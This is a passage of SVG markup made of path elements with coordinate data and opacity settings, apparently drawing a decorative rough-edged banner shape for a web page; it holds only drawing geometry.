d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path 